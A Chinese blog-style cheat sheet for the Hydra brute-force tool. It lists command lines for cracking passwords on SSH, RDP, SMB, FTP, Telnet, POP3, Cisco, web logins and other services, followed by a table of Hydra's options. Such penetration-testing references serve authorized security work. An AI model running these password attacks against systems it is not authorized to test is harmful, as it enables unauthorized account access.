渗透工具——Hydra破解弱密码

Hydra是一个自动化爆破工具,暴力破解弱密码,是一个支持众多协议的爆破工具,kali中以集成。

1.对ssh进行爆破

hydra -L user.txt -P password.txt ssh://192.168.3.163

-s 指定端口

hydra -L user.txt -P password.txt ssh://192.168.3.163 -s 7744

2.将破解密码保存到指定文件

hydra -L user.txt -P password.txt ssh://192.168.3.163 -s 40 -o ssh.txt

使用hydra破解ssh的密码

hydra -L users.txt -P password.txt -vV -o ssh.log -e ns IP ssh

破解https:

hydra -m /index.php -l username -P pass.txt IP https

破解teamspeak:

hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak

破解cisco:

hydra -P pass.txt IP cisco # hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable

破解smb:

hydra -l administrator -P pass.txt IP smb

破解pop3:

hydra -l muts -P pass.txt my.pop3.mail pop3

破解rdp

hydra IP rdp -l administrator -P pass.txt -V

破解http-proxy:

hydra -l admin -P pass.txt http-proxy://10.36.16.18

破解telnet

hydra IP telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V

破解ftp:

hydra IP ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
hydra IP ftp -l 用户名 -P 密码字典 -e ns -vV

get方式提交,破解web登录:

hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns IP http-get /admin/
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f IP http-get

重要参数:

-s    Port 使用非默认服务器端口而是其他端口时,指定其端口
-l    Login 已经获取登录ID的情况下输入登录ID
-L    FILE 未获取登录ID情况下指定用于暴力破解的文件(需要指出全路径)
-p    Pass 已经获取登录密码的情况下输入登录密码
-P    FILE 未获取登录密码的情况下指定用于暴力破解的文件(需要指出全路径)
-f    查找到第一个可以使用的ID和密码的时候停止破解
-o    FILE以STDOUT的形式输出结果值
-t 指定多线程数量,默认为16个线程


-R    修复之前使用的aborted/crashed session
-S    执行SSL(Secure Socket Layer)连接
-w    指定每个线程的回应时间(Waittime)(默认值:32秒)
-U    查看服务器组件使用明细
-4/6  指定IPv4/IPv6(默认值:IPv4)
-C    FILE 用于指定由冒号区分形式的暴力破解专用文件,即ID:Password形式
-x    MIN:MAX:CHARSET 暴力破解时不指定文件,而生可以满足指定字符集和最短、最长长度条件的密码来尝试暴力破解
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值